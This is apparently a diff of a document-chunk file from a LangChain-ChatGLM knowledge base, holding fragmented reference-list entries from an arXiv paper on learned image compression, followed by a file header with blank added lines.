+ page_content=' Cheng, H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
330
+ page_content=' Sun, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
331
+ page_content=' Takeuchi, and J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
332
+ page_content=' Katto, “Learned image compression with discretized gaussian mixture likelihoods and attention modules,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
333
+ page_content=' IEEE CVPR, 2020.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
334
+ page_content=' [5] C.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
335
+ page_content=' Christopoulos, A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
336
+ page_content=' Skodras, and T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
337
+ page_content=' Ebrahimi, “The JPEG2000 still image coding system: An overview,” IEEE Trans.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
338
+ page_content=' Consum.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
339
+ page_content=' Electron.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
340
+ page_content=', vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
341
+ page_content=' 46, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
342
+ page_content=' 4, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
343
+ page_content=' 1103–1127, 2000.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
344
+ page_content=' [6] Int.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
345
+ page_content=' Telecommun.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
346
+ page_content=' Union-Telecommun.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
347
+ page_content=' and Int.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
348
+ page_content=' Standards Org.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
349
+ page_content='/Int/Electrotech.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
350
+ page_content=' Com- mun.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
351
+ page_content=', “High efficiency video coding,” Rec.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
352
+ page_content=' ITU-T H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
353
+ page_content='265 and ISO/IEC 23008-2, 2019.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
354
+ page_content=' [7] Z.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
355
+ page_content=' Wang, E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
356
+ page_content=' Simoncelli, and A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
357
+ page_content=' Bovik, “Multiscale structural similarity for image quality assessment,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
358
+ page_content=' Asilomar Conf.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
359
+ page_content=' Signals, Systems, and Computers, 2003.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
360
+ page_content=' [8] R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
361
+ page_content=' Torfason, F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
362
+ page_content=' Mentzer, E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
363
+ page_content=' Agustsson, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
364
+ page_content=' Tschannen, R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
365
+ page_content=' Timofte, and L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
366
+ page_content=' Van Gool, “Towards image understanding from deep compression without decoding,” arXiv preprint arXiv:1803.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
367
+ page_content='06131, 2018.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
368
+ page_content=' [9] L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
369
+ page_content=' D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
370
+ page_content=' Chamain, F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
371
+ page_content=' Racap´e, J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
372
+ page_content=' B´egaint, A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
373
+ page_content=' Pushparaja, and S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
374
+ page_content=' Feltman, “End-to-end optimized image compression for machines, a study,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
375
+ page_content=' IEEE DCC, 2021, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
376
+ page_content=' 163–172.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
377
+ page_content=' [10] N.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
378
+ page_content=' Yan, C.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
379
+ page_content=' Gao, D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
380
+ page_content=' Liu, H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
381
+ page_content=' Li, L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
382
+ page_content=' Li, and F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
383
+ page_content=' Wu, “SSSIC: semantics-to-signal scalable image coding with learned structural representations,” IEEE Trans.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
384
+ page_content=' Image Processing, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
385
+ page_content=' 30, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
386
+ page_content=' 8939–8954, 2021.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
387
+ page_content=' [11] H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
388
+ page_content=' Choi and I.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
389
+ page_content=' V.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
390
+ page_content=' Baji´c, “Scalable image coding for humans and machines,” IEEE Trans.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
391
+ page_content=' Image Processing, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
392
+ page_content=' 31, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
393
+ page_content=' 2739–2754, 2022.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
394
+ page_content=' [12] T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
395
+ page_content=' M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
396
+ page_content=' Cover and J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
397
+ page_content=' A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
398
+ page_content=' Thomas, Elements of Information Theory, Wiley, 2nd edition, 2006.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
399
+ page_content=' [13] M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
400
+ page_content=' I.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
401
+ page_content=' Belghazi, A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
402
+ page_content=' Baratin, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
403
+ page_content=' Rajeswar, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
404
+ page_content=' Ozair, Y.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
405
+ page_content=' Bengio, A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
406
+ page_content=' Courville, and R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
407
+ page_content=' D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
408
+ page_content=' Hjelm, “MINE: Mutual information neural estimation,” arXiv preprint arXiv:1801.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
409
+ page_content='04062, 2018.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
410
+ page_content=' [14] D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
411
+ page_content=' P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
412
+ page_content=' Kingma and M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
413
+ page_content=' Welling, “Auto-encoding variational bayes,” arXiv preprint arXiv:1312.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
414
+ page_content='6114, 2013.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
415
+ page_content=' [15] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
416
+ page_content=' Ball´e, V.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
417
+ page_content=' Laparra, and E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
418
+ page_content=' P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
419
+ page_content=' Simoncelli, “End-to-end optimized image compression,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
420
+ page_content=' ICLR, 2017.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
421
+ page_content=' [16] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
422
+ page_content=' Redmon and A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
423
+ page_content=' Farhadi, “YOLOv3: An incremental improvement,” arXiv preprint arXiv:1804.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
424
+ page_content='02767, 2018.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
425
+ page_content=' [17] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
426
+ page_content=' Ball´e, V.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
427
+ page_content=' Laparra, and E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
428
+ page_content=' P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
429
+ page_content=' Simoncelli, “Density modeling of images using a generalized normalization transformation,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
430
+ page_content=' ICLR, 2016.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
431
+ page_content=' [18] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
432
+ page_content=' B´egaint, F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
433
+ page_content=' Racap´e, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
434
+ page_content=' Feltman, and A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
435
+ page_content=' Pushparaja, “CompressAI: A PyTorch library and evaluation platform for end-to-end compression research,” arXiv preprint arXiv:2011.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
436
+ page_content='03029, 2020.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
437
+ page_content=' [19] T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
438
+ page_content=' Xue, B.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
439
+ page_content=' Chen, J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
440
+ page_content=' Wu, D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
441
+ page_content=' Wei, and W.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
442
+ page_content=' T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
443
+ page_content=' Freeman, “Video enhancement with task-oriented flow,” Int.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
444
+ page_content=' J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
445
+ page_content=' Comput.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
446
+ page_content=' Vis.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
447
+ page_content=', vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
448
+ page_content=' 127, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
449
+ page_content=' 8, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
450
+ page_content=' 1106–1125, Feb.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
451
+ page_content=' 2019.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
452
+ page_content=' [20] T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
453
+ page_content='-Y.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
454
+ page_content=' Lin, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
455
+ page_content=' Maire, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
456
+ page_content=' Belongie, L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
457
+ page_content=' Bourdev, R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
458
+ page_content=' Girshick, J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
459
+ page_content=' Hays, P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
460
+ page_content=' Perona, D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
461
+ page_content=' Ra- manan, C.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
462
+ page_content=' L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
463
+ page_content=' Zitnick, and P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
464
+ page_content=' Doll´ar, “Microsoft COCO: Common objects in context,” 2014.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
465
+ page_content=' [21] E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
466
+ page_content=' Kodak, “Kodak lossless true color image suite (PhotoCD PCD0992),” http://r0k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
467
+ page_content=' us/graphics/kodak.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
468
+ page_content=' [22] H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
469
+ page_content=' Theil, Statistical decomposition analysis: With applications in the social and ad- ministrative sciences, North-Holland Publishing Company, 1972.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
1NE1T4oBgHgl3EQf5AWE/content/tmp_files/2301.03507v1.pdf.txt ADDED
@@ -0,0 +1,1396 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
